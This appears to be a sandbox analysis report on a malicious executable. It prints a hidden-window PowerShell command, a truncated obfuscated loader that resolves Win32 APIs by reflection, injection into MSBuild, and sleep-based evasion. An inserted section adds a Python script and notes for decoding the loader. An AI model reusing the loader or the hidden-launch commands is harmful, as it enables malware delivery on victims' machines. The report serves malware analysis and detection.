                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((fkp $Manicurist $Sawworker854), (GDT @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$Indbyggedesgamospore = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Ob
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Estimeringer8)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Estimeringer9, $false).DefineType($Sawworke
                Source: C:\Users\user\Desktop\PO_00290292.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $derremc = Get-Content 'C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement\Lection.Fle' ; powershell.exe "$derremc"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spejlvende Journaliseringssystems Conservatorial #><#Basilikers Toothcomb Letfordrvelig #>$Portugals = """Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{ S tv Po fi TupOvaBerGaafomPa(sm[BeS Tt HrPeiAunOsgEv]Ov`$SpSuioBelAnfPsa UlCedTo)Fo;bu Go`$OvNSkoOprDetNohObuRhm Cb OeLirAal BaTonbodDe Fu=Sk Ru`$ VSSpoAnlVafHeaPulHldRe.CiLHaePrnAsgFatInh M;Ne L Vi Af Ta`$PoD RrAniElf OtSvsPasUnyexs OtSteRimBumreeRetAnsSm Tr=Ch NoNArevvwAp-LaO NbSojOpe DcStt P Tb Ry FtSneVa[Pr]Wh Ud(Le`$miNBioLir VtPahMuuUdm TbSaeperGalAfaInnDedLi Op/ci St2Bo)An; K Ps`$PrRfioCadUntUme PgAnnGyeovtAn1St6Ug8Ab=Pi' CS AU D'In+ P'EdBUnSSpTBoRUnIThNDoG l'Aa;Af Da Co Im TF FoWarDe( D`$StNEnoChnCyetexNupudeOvccrt FaTanPatPa= U0Pl;No Ho`$NoNByoHjnUtelix Tp OeSoc St FaUnnSvtSy Op-ShlTetRe J`$KoNakoVurActQuh SuBumUdbYeeovrOrlSuaMinCrdcr;Li U`$SeNMaoPinTrePaxAlpspeLocHetSmaUnnBetBa+ro= G2Tr) P{Se Un He He Un Au Ko Ta ar`$PoDDer BiDefTet BsTrsBoyThs BtNaeunmKnmWaeAmtDosCa[ S`$ScNUgoBlnMaeApxEkpCaeRec At HaInnentDr/Ho2 U] K Ka= S Da[stcSmoPan BvSkeLer OtOb] N:Zi:UnTreoAaB SyBrt GeHa( d`$ JSMaoWilkofHoaOvlHodOm.No`$AtRPaoPodGitage NgTnnMaemat F1re6Ar8Be.CoI FnPhvSpoNektieJo(Fl`$PhN Do OnBoe RxCop ReSicTatInaSanBatJo,Ln Sp2Fu)Ep,Tr K1Cl6Un)Br;Po in F`$gaDPerChiMefKotRasOvsTey SsRetBoeFimSumIne wtUdsFi[Ar`$TrNMoo Sn Ue DxCypByeRocCotAnaNunomtTe/Ph2No]st Ar=So HaxGaoKnrSoaQummiiBa Sk`$MoDShrSei Sf UtsosPrsSpyLesdotBieDimDomRreUntSps P[ U`$UnNAroRen AeBexHopGee Sc PtBaaInnIntEa/Be2ov]Fi Po1Pl1 M0Gl;ra N un Po Fl}Fo Ou[PsSCotUnrPhiSynSogUn]De[PeSSuy PsLitSkepymIn.KaTSoe LxAntEu.SiEVan Dc UodedPriFnn PgSp]Ph: e:AyAPoSOoC MIFuIJa.PaGGee LtBeSCatStrEri wnUng B(da`$ElDCarIsiAtfPat BsChs SyMnsPttSeeUdmOvmaueDrtPas E)Ra;Un}St`$VeEBismetBjiGamSteHarDiiHanTogSmetorCh0 D=KoPGrySvxPuiOvdSme Ks l4Fi 
Sk'Au3StDHo1Af7Bo1TrDal1SyAsp0SiBri0 H3Cr4Af0Ma0PlABa0Af2 B0Gr2St'Ga;Ov`$deENesNetTiiFimBreKirSaiLenWagfjeBorLe1Py=AuP lyLexUniFedCleGesat4Op Fa'Ra2Pr3ta0 e7 D0KlDUn1NoCCo0Li1 R1 TDWe0Un1 D0Yv8Su1 TA O4 R0 A3ny9Sl0Fo7Cr0In0Ta5DaD K5ThCLo4 W0Kd3 KB F0Em0ig1SkD D0ReF R0ir8Bu0FoBOp2Ir0De0 SFUg1arAMa0St7Va1Be8 A0UnBKa2Ge3Ho0JuB A1 RA A0Vi6 G0 G1An0DeAHa1KaDPr'Wh; V`$ CEKos StSoi SmEneUnr ui TnNog SeOvrMe2As=ApPTaySaxDriUndreeTesSp4In ap'In2 d9Bl0CrBSa1 AAUn3MaESk1VaCun0Ch1Te0DdDin2SlFBu0SaAAl0TeA F1DyC D0TaBSt1 KDEl1TrDbr'Ra;Ca`$FaEHasSetPaiNim ReElrHai FnStgUre Irgr3 I=LaPGayWexfliBddSoeBosPa4No ek'Re3StDIn1mi7Un1RuDCp1 NA N0maBRo0Fa3 V4Ma0Br3UnC F1MiBZo0 H0So1FeAKa0Ma7Bl0Un3 C0CaB D4Mo0Pr2Da7Sc0Ho0Hu1ReA I0DiBFj1AgCFl0Ud1Su1SeEHo3PhDFo0CaBCo1 TCgr1re8Ma0 D7An0UdDBo0AtBJu1VeDPo4Jo0Mi2 P6 P0 SFFo0Ju0re0CoA S0Bl2 S0 LBUn3CaCNd0UnBLo0Af8 B' M;In`$DeECosDrtDri Sm se UrTriOunRegSke MrPr4Ti=deP IyPexSpiSpdCee FsSu4Zo Zo'At1PaDva1SoA E1ReCud0 B7Ha0 E0Mi0 A9Ti'No;Sw`$SeEHasBltSeiPamKoeOvrPoiGrnGegObe ArWi5Sk=DiPabyToxGaiSedOre GsVo4St D' F2Da9Ko0 MBtr1LiAAd2 U3Fe0Sl1sk0UnA P1asBTr0Do2
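The padded PowerShell text in the rows above can be unwound with a few lines of Python. This is an added example written for this page, not code from the report or from the sample, and it assumes only what the command line itself shows: every third character of the script is real (two junk characters precede each one); each real `$` inside the outer double-quoted string is escaped as `` `$ `` and has to be unescaped first; and the de-padded script defines a helper (it reads as Pyxides4 once the padding is gone) that converts a hex string to bytes, XORs each byte with 110 and returns the ASCII text. The key 110 is the literal that follows -bxor in the decoded loop, and decoding the helper's first argument to System.dll confirms it. The sample fed to the code is the second rendered line of the command line, copied from the report and split at statement boundaries; the Python names (strip_padding, extract_literals, analyse) are the example's own.

```python
"""Peel the two obfuscation layers visible in the powershell.exe command line.

Added example written for this page, not code from the report or the sample.
Layer 1: only every third character of the script is real; real '$' signs are
escaped as `$ inside the outer double-quoted string. Layer 2: the de-padded
script's helper turns a hex string into bytes, XORs each with 110 and returns
ASCII. SAMPLE is one rendered line of the command line, copied from the report.
"""
import re

XOR_KEY = 110  # the literal after -bxor in the decoded loop; "System.dll" confirms it

# Copied from the start of the padded script: decodes to the function header.
HEADER_FRAGMENT = "Ko;SmFOmu RnFac FtTwiStoFonDe OtPAlyInxHui PdSkeInsEr4 F In{"

SAMPLE = (
    "Sk'Au3StDHo1Af7Bo1TrDal1SyAsp0SiBri0 H3Cr4Af0Ma0PlABa0Af2 B0Gr2St'Ga;"
    "Ov`$deENesNetTiiFimBreKirSaiLenWagfjeBorLe1Py=AuP lyLexUniFedCleGesat4Op Fa'Ra2Pr3ta0 e7 D0KlDUn1NoCCo0Li1 R1 TDWe0Un1 D0Yv8Su1 TA O4 R0 A3ny9Sl0Fo7Cr0In0Ta5DaD K5ThCLo4 W0Kd3 KB F0Em0ig1SkD D0ReF R0ir8Bu0FoBOp2Ir0De0 SFUg1arAMa0St7Va1Be8 A0UnBKa2Ge3Ho0JuB A1 RA A0Vi6 G0 G1An0DeAHa1KaDPr'Wh;"
    " V`$ CEKos StSoi SmEneUnr ui TnNog SeOvrMe2As=ApPTaySaxDriUndreeTesSp4In ap'In2 d9Bl0CrBSa1 AAUn3MaESk1VaCun0Ch1Te0DdDin2SlFBu0SaAAl0TeA F1DyC D0TaBSt1 KDEl1TrDbr'Ra;"
    "Ca`$FaEHasSetPaiNim ReElrHai FnStgUre Irgr3 I=LaPGayWexfliBddSoeBosPa4No ek'Re3StDIn1mi7Un1RuDCp1 NA N0maBRo0Fa3 V4Ma0Br3UnC F1MiBZo0 H0So1FeAKa0Ma7Bl0Un3 C0CaB D4Mo0Pr2Da7Sc0Ho0Hu1ReA I0DiBFj1AgCFl0Ud1Su1SeEHo3PhDFo0CaBCo1 TCgr1re8Ma0 D7An0UdDBo0AtBJu1VeDPo4Jo0Mi2 P6 P0 SFFo0Ju0re0CoA S0Bl2 S0 LBUn3CaCNd0UnBLo0Af8 B' M;"
    "In`$DeECosDrtDri Sm se UrTriOunRegSke MrPr4Ti=deP IyPexSpiSpdCee FsSu4Zo Zo'At1PaDva1SoA E1ReCud0 B7Ha0 E0Mi0 A9Ti'No;"
    # The rendered page most likely collapsed a double space just before the last
    # literal ("St  D'" shows as "St D'"), which knocks a plain stride decoder off
    # sync from here on; the literal is also cut where the report truncates it.
    "Sw`$SeEHasBltSeiPamKoeOvrPoiGrnGegObe ArWi5Sk=DiPabyToxGaiSedOre GsVo4St D' F2Da9Ko0 MBtr1LiAAd2 U3Fe0Sl1sk0UnA P1asBTr0Do2"
)


def unescape_dq(text: str) -> str:
    """Undo the PowerShell double-quoted-string escape applied by the outer script."""
    return text.replace("`$", "$")


def strip_padding(text: str, stride: int = 3, offset: int = 2) -> str:
    """Layer 1: keep one character out of every `stride`, starting at `offset`."""
    return text[offset::stride]


def decode_hex_xor(hex_text: str, key: int = XOR_KEY) -> str:
    """Layer 2: mirror the script's helper (hex pairs -> bytes -> XOR key -> ASCII)."""
    if len(hex_text) % 2:
        raise ValueError("odd-length hex literal")
    raw = bytes(int(hex_text[i:i + 2], 16) ^ key for i in range(0, len(hex_text), 2))
    return raw.decode("ascii")


# A padded hex literal: a quote, then triples whose third character is a hex
# digit, then a closing quote in third position (or end of input if truncated).
# Anchoring on this shape instead of counting from the start of the text means
# one dropped or added junk character cannot shift the decoder for everything
# that follows it.
PADDED_HEX = re.compile(r"'((?:..[0-9A-Fa-f])+)(?:..'|.{0,2}$)")


def extract_literals(padded: str, key: int = XOR_KEY) -> list:
    """Find every padded hex literal in raw command-line text and decode it."""
    out = []
    for m in PADDED_HEX.finditer(padded):
        try:
            out.append(decode_hex_xor(strip_padding(m.group(1)), key))
        except (ValueError, UnicodeDecodeError):
            continue  # wrong key or damaged literal: skip it rather than abort
    return out


def analyse(sample: str = SAMPLE) -> dict:
    """Return both views: the naive stride decode and the resynchronising extraction."""
    text = unescape_dq(sample)
    return {"stride_decoded": strip_padding(text), "literals": extract_literals(text)}


if __name__ == "__main__":
    result = analyse()
    print(result["stride_decoded"])
    for name in result["literals"]:
        print(repr(name))
```

On the sample the stride decode reads cleanly through `$Estimeringer4=Pyxides4 '...'` and then degrades into noise at the collapsed space, while `extract_literals` recovers all six values: System.dll, Microsoft.Win32.UnsafeNativeMethods, GetProcAddress, System.Runtime.InteropServices.HandleRef, string, and the truncated GetModul. Together with the AMSI rows above (GetDelegateForFunctionPointer over a delegate built with DefineDynamicAssembly), that is a loader resolving Win32 exports by reflection through UnsafeNativeMethods.GetProcAddress and GetModuleHandle; the `(IntPtr, UInt32, UInt32, UInt32) -> IntPtr` signature in the first AMSI row has the shape of VirtualAlloc, which is an inference from the signature and not something the report names. When working from real telemetry, take the command line from the raw process tree, Sysmon Event ID 1, or 4688 with command-line logging rather than from a rendered report page, so that whitespace in the padding survives and the stride decode alone is enough.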
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04AE369B push ebx; iretd 4_2_04AE36DA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04AE60B0 push esp; iretd 4_2_04AE6189
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_075C75FF push esp; iretd 4_2_075C760B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_075C6CDC push ecx; iretd 4_2_075C6CDE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0869F074 pushad ; ret 4_2_0869F07B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0869F24B pushfd ; ret 4_2_0869F266
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_086A34E8 push edx; retf 4_2_086A3526
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_086A0D39 push eax; retf 4_2_086A0D3B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0869FBF6 push cs; ret 4_2_0869FC08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00AB0CB5 push edi; ret 5_2_00AB0CC2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00AB0C4B push edi; retf 5_2_00AB0C3A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01130138 push E47BA34Fh; ret 5_2_0113013D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01130489 pushad ; ret 5_2_01130491
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_23235D00 push eax; iretd 5_2_23235DFC
                Source: C:\Users\user\Desktop\PO_00290292.exe File created: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\nsExec.dll
                Source: C:\Users\user\Desktop\PO_00290292.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (67 identical entries)
                Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (76 identical entries)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599764
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599203
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599091
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598983
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598547
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6299
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3099
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6093
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3442
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 2008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 7818
                Source: C:\Users\user\Desktop\PO_00290292.exe TID: 5448 Thread sleep time: -30500s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220 Thread sleep time: -23980767295822402s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7276 Thread sleep count: 6093 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280 Thread sleep count: 3442 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7312 Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -27670116110564310s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -100000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -199750s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99766s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99641s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99516s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99407s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99282s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99157s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99047s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98938s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98813s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98688s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98563s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98438s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98328s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98218s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98107s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99984s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99765s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99656s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99546s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99437s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99328s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99218s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -99109s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98999s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98890s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98780s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98671s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98562s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98452s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98343s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98234s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -98112s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -599875s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -599764s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -599656s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -599547s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -599430s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -599312s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -599203s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -599091s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -598983s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -598875s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -598766s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -598656s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7744 Thread sleep time: -598547s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\PO_00290292.exe Code function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040596F
                Source: C:\Users\user\Desktop\PO_00290292.exe Code function: 0_2_004064C1 FindFirstFileW,FindClose, 0_2_004064C1
                Source: C:\Users\user\Desktop\PO_00290292.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 100000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99641
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99516
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99407
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99282
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99157
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98938
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98813
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98688
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98107
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99984
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99546
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99437
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99109
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98999
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98671
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98452
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98343
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98234
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98112
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599764
